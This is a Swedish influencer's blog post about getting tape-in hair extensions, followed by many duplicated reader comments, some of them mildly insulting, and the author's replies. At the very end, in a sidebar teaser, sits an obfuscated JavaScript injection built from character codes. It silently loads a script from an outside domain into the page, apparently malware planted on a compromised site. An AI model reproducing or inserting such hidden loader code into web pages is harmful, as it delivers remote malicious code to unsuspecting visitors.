Nytt svall igen.. -Vad tycker du?

 

Då var det dags igen☺️

SOM jag längtat! NU är jag med tjock, långt svall igen!

Skonsamt tejphår från TOUPEMA BELGAL 🌟👌🏻har vi satt i

(Bobby förbjöd nämligen keratin, för att inte förstöra mitt egna hå. Efter lååånga diskussioner gav jag med mig. )  

Jag veeeeet att majoriteten tycker att jag är SÅ mycket finare i mitt naturliga hår.

Men nu vill jag ha extensions och nu sätter jag i det igen..  

-Så det så! 😝

IMG_6808

Färg, isättning av Toupemahåret fixade härliga Tilda på mig!🙏🏻

-TACK gumman! Jag är lika nöjd som vanligt! 💖

IMG_7182 IMG_7186 IMG_7194 IMG_7195

Omväxling förnöjer!

Kram på dig!💖

/My Martens

 

105 Komentarer

 1. Nej, nej, nej! Du var mycket finare utan extenions plus kolla programmet Uppdrag granskning ang. hårförlängning så kanske du får dig en tankeställare!

 2. Löshår är ingenting att glatt skylta med just nu… Har du missat kalla fakta eller debatten som varit om löshår senaste dagarna? Hade jag varit du hade jag ibte skrivit detta inlägg ?

  • Jodå…. Toupema Belgal är ett bra varumärke med rent mjöl i påsen ☺️ DET sköna jag inte för…… man ska inte blanda ihop sak att sak… ?

  • Va jo! Det ser du väl ? Mitt egna hår har ju blåvita fantatsikt! Vad har det med mina extensions att göra? ? Dom slutar jag inte med?! Konstig fråga ?? kram

 3. Det är ok, men gillar det som är naturligt bättre. Är stolt över att ha ett friskt o äkta hår som äldre tant. ?Tror att alla dessa förlängningar osv sliter på håret i längden. Sen handlar det om vilken förebild man vill vara inför sina barn osv, dvs att man duger som man är, tycker det är viktigt.
  Men vi är alla olika o har olika värderingar?

 4. Guuud så kritiska folk är ?! Det är ju bara hår! Nåja, alla har väl rätt till sin åsikt, så då får jag säkert också säga att jag tycker det långa svallet är finare ?. Fin färg också!

 5. Nej, nej, nej! Du var mycket finare utan extenions plus kolla programmet Uppdrag granskning ang. hårförlängning så kanske du får dig en tankeställare!

 6. Det är väl flera dagar sedan du satte i håret? Fint men inte så stor skillnad, inte så mycket längre så ändå lite onödigt känner jag och självklart så sliter även tejphår en del. Snyggt men hade nog bara toppat det lite eller varför inte klippt en längre page fräscht, el lugg, men Du gör som Du vill. Har du nyfyllda läppar också, fin. Lyxigt med frisörbesök så ofta ;)Trevlig helg.

  • Hej Fia! Tack =) jag är supernöjd… jag behöver ha länge hår inför kommande plåtningar, SÅÅÅÅÅ kul! Alltså smaken är ju som baken, delad =) jag älskar mitt långa svall…. Men jag trivs också bra i mitt egna naturliga hår nu när det äntligen är tjockt och fylligt igen =) Men samtidigt så tycker jag att ombyte förnöjer, så jag kommer fortsätta att variera det efter mitt smak och eget tycke =) Min läppar har jag min farmor och far att tacka för. jag har och kommer aldrig att fylla dessa =) kram och trevlig helg!

 7. Löshår är ingenting att glatt skylta med just nu… Har du missat kalla fakta eller debatten som varit om löshår senaste dagarna? Hade jag varit du hade jag ibte skrivit detta inlägg 😅

  • Jodå…. Toupema Belgal är ett bra varumärke med rent mjöl i påsen ☺️ DET sköna jag inte för…… man ska inte blanda ihop sak att sak… 😃

  • Va jo! Det ser du väl 😃 Mitt egna hår har ju blåvita fantatsikt! Vad har det med mina extensions att göra? 😂 Dom slutar jag inte med?! Konstig fråga 🙈😂 kram

 8. Men då finns det väl ingen anledning att köpa Bobbys kapslar om man också behöver lägga pengar på extensions? Dubbel kostnad:( Lägg pengarna på extensions direkt i så fall. Rätta mig om jag har fel. Trevlig helg på er!

  • Hej AO! Säger som ovan, finns inga dumma frågor… bara dumma svar ? Alltså för att dra en jämförelse, varför ta hand om min egen hy? När jag ändå kan sminka över den? Låter jämförelsen lite knasig? Jag personligen boostar mitt hår för fullt =) Även under dom perioderna som jag använder extensions, peruk, trens osv… Mitt egna hår behöver dessutom vara starkt just för att orka bära upp extensions. Jag ÄLSKSR att kunna variera mig. Genom mitt jobb som influenser så görs det plåtningar för olika kampanjer titt som tätt. Som modell är det bara att rätta sig i ledet, ska jag ha kort, då åker det ut. Ska jag ha långt då åker det i =) Omväxling förnöjer! Men oavsett vad jag har mitt hår så fortsätter jag att vårda det ömt.Med Bobbys superhair, bra hårvårdsprodukter och en dos extra kärlek på det =) Trevlig helg!

   • Förlåt att jag är en dum 60+-are;)) Tycker bara att du är så fin som du är och verkar vara en underbar mamma till Lilleman. Fans varken extensions, lösögonfransar, botox eller fillers på min tid, vi har överlevt ändå:)) Inte lätt för er ungdomar idag, så många krav och förväntningar hur ni ska se ut:(( Kämpa på. Kram

    • Hihi! Ja…. tiderna förändras…. förutsättningar, och trenderna likaså. Jag tycker att man bara ska göra det som man själv vill Och ute döma alla andra för vad dom vill =) Kram

 9. Tycker det ser bra ut men jag har en fråga. Jag är korthårig själv så jag har ingen erfarenhet; det här med att dra fingrarna genom håret, det måste ni missa ni som har förlängningar. Jag kan tänka mig att första gången man gör det och har glömt bort dem så tar det tvärstopp. Sånt kan man ju också fundera över så här på fredags kvällen! Nåja, trevlig helg på er alla!

  • Hihi! Det finns inga dumma frågor… bara dumma svar ? Det är såklart en vanesak. Jag har haft extensions i över tio år. Olika metoder, keratin, klipps, trend, tejp osv.. Första gången är det såklart ovant. Precis så som med allt annat =) Färgar man brynen hemma så tar det någon dag innan man vänjer sig. Sminkar jag mig mer än vad jag brukar så hajjar jag till varje gång som jag går förbi en spegel osv. Jag personlogen tycker att tejpen känns mindre en keratin tex… =) Kram

 10. Det är ok, men gillar det som är naturligt bättre. Är stolt över att ha ett friskt o äkta hår som äldre tant. 👵Tror att alla dessa förlängningar osv sliter på håret i längden. Sen handlar det om vilken förebild man vill vara inför sina barn osv, dvs att man duger som man är, tycker det är viktigt.
  Men vi är alla olika o har olika värderingar😊

 11. Guuud så kritiska folk är 😂! Det är ju bara hår! Nåja, alla har väl rätt till sin åsikt, så då får jag säkert också säga att jag tycker det långa svallet är finare 😀. Fin färg också!

 12. Tycker ditt naturliga hår är så fint?Men du är lika fin i långt.Det som känns bäst för en själv ska man ju naturligtvis köra på.Super i bägge som sagt ❤️

 13. Det är väl flera dagar sedan du satte i håret? Fint men inte så stor skillnad, inte så mycket längre så ändå lite onödigt känner jag och självklart så sliter även tejphår en del. Snyggt men hade nog bara toppat det lite eller varför inte klippt en längre page fräscht, el lugg, men Du gör som Du vill. Har du nyfyllda läppar också, fin. Lyxigt med frisörbesök så ofta ;)Trevlig helg.

  • Hej Fia! Tack =) jag är supernöjd… jag behöver ha länge hår inför kommande plåtningar, SÅÅÅÅÅ kul! Alltså smaken är ju som baken, delad =) jag älskar mitt långa svall…. Men jag trivs också bra i mitt egna naturliga hår nu när det äntligen är tjockt och fylligt igen =) Men samtidigt så tycker jag att ombyte förnöjer, så jag kommer fortsätta att variera det efter mitt smak och eget tycke =) Min läppar har jag min farmor och far att tacka för. jag har och kommer aldrig att fylla dessa =) kram och trevlig helg!

 14. Men då finns det väl ingen anledning att köpa Bobbys kapslar om man också behöver lägga pengar på extensions? Dubbel kostnad:( Lägg pengarna på extensions direkt i så fall. Rätta mig om jag har fel. Trevlig helg på er!

  • Hej AO! Säger som ovan, finns inga dumma frågor… bara dumma svar 😉 Alltså för att dra en jämförelse, varför ta hand om min egen hy? När jag ändå kan sminka över den? Låter jämförelsen lite knasig? Jag personligen boostar mitt hår för fullt =) Även under dom perioderna som jag använder extensions, peruk, trens osv… Mitt egna hår behöver dessutom vara starkt just för att orka bära upp extensions. Jag ÄLSKSR att kunna variera mig. Genom mitt jobb som influenser så görs det plåtningar för olika kampanjer titt som tätt. Som modell är det bara att rätta sig i ledet, ska jag ha kort, då åker det ut. Ska jag ha långt då åker det i =) Omväxling förnöjer! Men oavsett vad jag har mitt hår så fortsätter jag att vårda det ömt.Med Bobbys superhair, bra hårvårdsprodukter och en dos extra kärlek på det =) Trevlig helg!

   • Förlåt att jag är en dum 60+-are;)) Tycker bara att du är så fin som du är och verkar vara en underbar mamma till Lilleman. Fans varken extensions, lösögonfransar, botox eller fillers på min tid, vi har överlevt ändå:)) Inte lätt för er ungdomar idag, så många krav och förväntningar hur ni ska se ut:(( Kämpa på. Kram

    • Hihi! Ja…. tiderna förändras…. förutsättningar, och trenderna likaså. Jag tycker att man bara ska göra det som man själv vill Och ute döma alla andra för vad dom vill =) Kram

 15. Tycker det ser bra ut men jag har en fråga. Jag är korthårig själv så jag har ingen erfarenhet; det här med att dra fingrarna genom håret, det måste ni missa ni som har förlängningar. Jag kan tänka mig att första gången man gör det och har glömt bort dem så tar det tvärstopp. Sånt kan man ju också fundera över så här på fredags kvällen! Nåja, trevlig helg på er alla!

  • Hihi! Det finns inga dumma frågor… bara dumma svar 😉 Det är såklart en vanesak. Jag har haft extensions i över tio år. Olika metoder, keratin, klipps, trend, tejp osv.. Första gången är det såklart ovant. Precis så som med allt annat =) Färgar man brynen hemma så tar det någon dag innan man vänjer sig. Sminkar jag mig mer än vad jag brukar så hajjar jag till varje gång som jag går förbi en spegel osv. Jag personlogen tycker att tejpen känns mindre en keratin tex… =) Kram

 16. Tycker ditt naturliga hår är så fint😊Men du är lika fin i långt.Det som känns bäst för en själv ska man ju naturligtvis köra på.Super i bägge som sagt ❤️

 17. Jag kan varken säga bu eller bä ang. din längd på håret för jag tycker man ska få ha det som man vill ? och eftersom du inte har jättekort hår i vanliga fall så är inte skillnaden så där jättestor då man ser en bild och du passar i både och. Jag har haft kreatinfästen i många år, sedan började jag med Hairtalk tejp för jag ville skona mitt hår men för mig funkade det inte alls med tejp, jag hade special schampo och balsam och inpackning och för värmebehandling och jag gjorde ”alla rätt” men de gled ur på något vis..Till slut blev jag så irriterad så jag lät allt vara och har varit utan i över ett år nu, men det var svårt från början, det är ju en vanesak det där att ha löshår i också men jag är väl lite som dig, känner jag för att sätta in hår igen så gör jag det.. Ska man vara så stenhård så är det ju fake att sminka sig, färga håret, måla naglarna mm. Fattar inte att folk ska lägga sig i såna saker, huvudsaken är väl att man själv trivs?

  • Det förstår faktiskt inte jag heller…. MEN, jag tror att månaga där ute inte har varken råd/möjlighet att sätta i exteniosn. Många mindre orter har inte ens det utbudet hos sina frisörer… och då slår tyvärr den klassiska jantelagen till.. =) Alla får göra precis som man vill =)

 18. Jag kan varken säga bu eller bä ang. din längd på håret för jag tycker man ska få ha det som man vill 🙂 och eftersom du inte har jättekort hår i vanliga fall så är inte skillnaden så där jättestor då man ser en bild och du passar i både och. Jag har haft kreatinfästen i många år, sedan började jag med Hairtalk tejp för jag ville skona mitt hår men för mig funkade det inte alls med tejp, jag hade special schampo och balsam och inpackning och för värmebehandling och jag gjorde ”alla rätt” men de gled ur på något vis..Till slut blev jag så irriterad så jag lät allt vara och har varit utan i över ett år nu, men det var svårt från början, det är ju en vanesak det där att ha löshår i också men jag är väl lite som dig, känner jag för att sätta in hår igen så gör jag det.. Ska man vara så stenhård så är det ju fake att sminka sig, färga håret, måla naglarna mm. Fattar inte att folk ska lägga sig i såna saker, huvudsaken är väl att man själv trivs?

  • Det förstår faktiskt inte jag heller…. MEN, jag tror att månaga där ute inte har varken råd/möjlighet att sätta i exteniosn. Många mindre orter har inte ens det utbudet hos sina frisörer… och då slår tyvärr den klassiska jantelagen till.. =) Alla får göra precis som man vill =)

 19. Börjar nästan gapskratta! Du gör värsta reklamen för Bobbys hårkapslar, köp, köp, sen i nästa inlägg sätter du i extensions??!!?? Här snackar vi dubbelmoral….! ????

  • verkligen inte… jag har ätit OCH skrivit om Bobbys Superhair i ca 1.5 år. Jag har haft i ur och extensions FYRA gånger under denna period… vilket ni mina kära bloggläsare fått ta del av… =) Jag kommer fortsätta äta Bobbys superhair mäven med extgensions… Det fattar nib som också äter Bobbys super hair! hehehe! =) OMBYTE FÖRNÖJER! Jag Jag trivs bra i båda…. men jag märker att den svenska jantelagen slår till VARJE gång jag sätter i extenions. DETG får mig att gapskratta *LOL =)

 20. Börjar nästan gapskratta! Du gör värsta reklamen för Bobbys hårkapslar, köp, köp, sen i nästa inlägg sätter du i extensions??!!😳😳 Här snackar vi dubbelmoral….! 😖😖😖🤣

  • verkligen inte… jag har ätit OCH skrivit om Bobbys Superhair i ca 1.5 år. Jag har haft i ur och extensions FYRA gånger under denna period… vilket ni mina kära bloggläsare fått ta del av… =) Jag kommer fortsätta äta Bobbys superhair mäven med extgensions… Det fattar nib som också äter Bobbys super hair! hehehe! =) OMBYTE FÖRNÖJER! Jag Jag trivs bra i båda…. men jag märker att den svenska jantelagen slår till VARJE gång jag sätter i extenions. DETG får mig att gapskratta *LOL =)

 21. NOPP! Nej, synd att du inte ser det vi läsare ser att du är finare&fräshare i ditt egna naturliga lite kortare hår.
  Nu ser du bara ut som en uppblåst bimbo, men det kanske tilltalar dig vem vet …

  • Hihi! Men som jag skrev… JAG trivs i båda alternativen. Jag har möjligheten att variera mig. =) Jag är bokad på plåtning som långhårig. Jag får betalt för det. Jag ser verkligen inte någon alneldning för mig att sluta med någonting som jag både trivs bra, känner mig bekväm i (som sagt tio år….) OCH dessutom tjänar pengar på =) Att du tycker jag ser ut som en uppblåst bimbo, det säger mer om dig än om mig =) hahah! ha en trevlig helg fina! Kramis

   • Hej My!
    Varför fokuserar DU bara på det ”lilla” negativa jag skrev …
    Du frågade vad vi läsare tyckte om dina extentions och jag skrev OCKSÅ att jag tycker du är finare när du är dig själv 100 % dvs utan extentions och lite kortare. Det var en komplimang. Så.
    Sen att jag skrev ”uppblåst bimbo” var menat som ETT SKÄMT du vet med glimten i ögat men tydligen är jag ett nättroll för att jag svarade ÄRLIGT på din fråga. Borde kanske satt en sådan här ? efter men missade detta. Väldigt lätt för er bloggare att kalla oss läsare för ”nättroll” så fort vi inte skriver ”snälla, gulliga och positiva” kommentarer.
    Nej du My, jag ÄR INGET NÄTTROLL, PUNKT!

 22. NOPP! Nej, synd att du inte ser det vi läsare ser att du är finare&fräshare i ditt egna naturliga lite kortare hår.

  Nu ser du bara ut som en uppblåst bimbo, men det kanske tilltalar dig vem vet …

  • Hihi! Men som jag skrev… JAG trivs i båda alternativen. Jag har möjligheten att variera mig. =) Jag är bokad på plåtning som långhårig. Jag får betalt för det. Jag ser verkligen inte någon alneldning för mig att sluta med någonting som jag både trivs bra, känner mig bekväm i (som sagt tio år….) OCH dessutom tjänar pengar på =) Att du tycker jag ser ut som en uppblåst bimbo, det säger mer om dig än om mig =) hahah! ha en trevlig helg fina! Kramis

   • Hej My!

    Varför fokuserar DU bara på det ”lilla” negativa jag skrev …

    Du frågade vad vi läsare tyckte om dina extentions och jag skrev OCKSÅ att jag tycker du är finare när du är dig själv 100 % dvs utan extentions och lite kortare. Det var en komplimang. Så.

    Sen att jag skrev ”uppblåst bimbo” var menat som ETT SKÄMT du vet med glimten i ögat men tydligen är jag ett nättroll för att jag svarade ÄRLIGT på din fråga. Borde kanske satt en sådan här 😉 efter men missade detta. Väldigt lätt för er bloggare att kalla oss läsare för ”nättroll” så fort vi inte skriver ”snälla, gulliga och positiva” kommentarer.

    Nej du My, jag ÄR INGET NÄTTROLL, PUNKT!

 23. Vilket provocerande ämne….!?
  Jag tycker du är fin i båda. Allra snyggast dock, enligt mig, är när du har ditt egna hår rakt bara sådär enkelt.
  Ha en fin helg ni tre?

 24. Vilken stor grej det blev av det här, var och
  varannan kändis har längre löshår eller fyller ut håret med det, för att få det tjockare. Hur kan man gå till person angrett och skriva fula ord för det och skriva om att vara en dålig mamma . Du gör ju allt för din son. Stor kram?

 25. Vilket provocerande ämne….!?
  Jag tycker du är fin i båda. Allra snyggast dock, enligt mig, är när du har ditt egna hår rakt bara sådär enkelt.
  Ha en fin helg ni tre😊

 26. Vilken stor grej det blev av det här, var och
  varannan kändis har längre löshår eller fyller ut håret med det, för att få det tjockare. Hur kan man gå till person angrett och skriva fula ord för det och skriva om att vara en dålig mamma . Du gör ju allt för din son. Stor kram🌸

 27. Men va är det för fel på folk eller DÖ vill jag kalla er som spyr gälla över My. Vad ger er rätten att kalla henne det ni gör?
  Tror ni är några andra bloggare som måste skriva skit för att må bra själva.
  Kram My o trevlig helg trots idiotiska kommentarer

 28. Men va är det för fel på folk eller DÖ vill jag kalla er som spyr gälla över My. Vad ger er rätten att kalla henne det ni gör?
  Tror ni är några andra bloggare som måste skriva skit för att må bra själva.
  Kram My o trevlig helg trots idiotiska kommentarer

 29. Hej
  Är en av dom som tycker du var såå fin i ditt egna hår, men som du säger omväxling förnöjer och man bestämmer själv i sista ändan. Min fråga är dock har du sprutat läpparna också tycker överläppen ser mer fyllig ut.
  Kram

  • Hej Pernilla! Och man får tycka och tänka och även förmedla sin åsikt ☺️ Gällande läpparna… nej, jag har inte sprutat mina läppar och kommer inte att göra det heller ☺️ Mina läppar har och förblir naturliga… ?

 30. Hej

  Är en av dom som tycker du var såå fin i ditt egna hår, men som du säger omväxling förnöjer och man bestämmer själv i sista ändan. Min fråga är dock har du sprutat läpparna också tycker överläppen ser mer fyllig ut.
  Kram

  • Hej Pernilla! Och man får tycka och tänka och även förmedla sin åsikt ☺️ Gällande läpparna… nej, jag har inte sprutat mina läppar och kommer inte att göra det heller ☺️ Mina läppar har och förblir naturliga… 😄

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/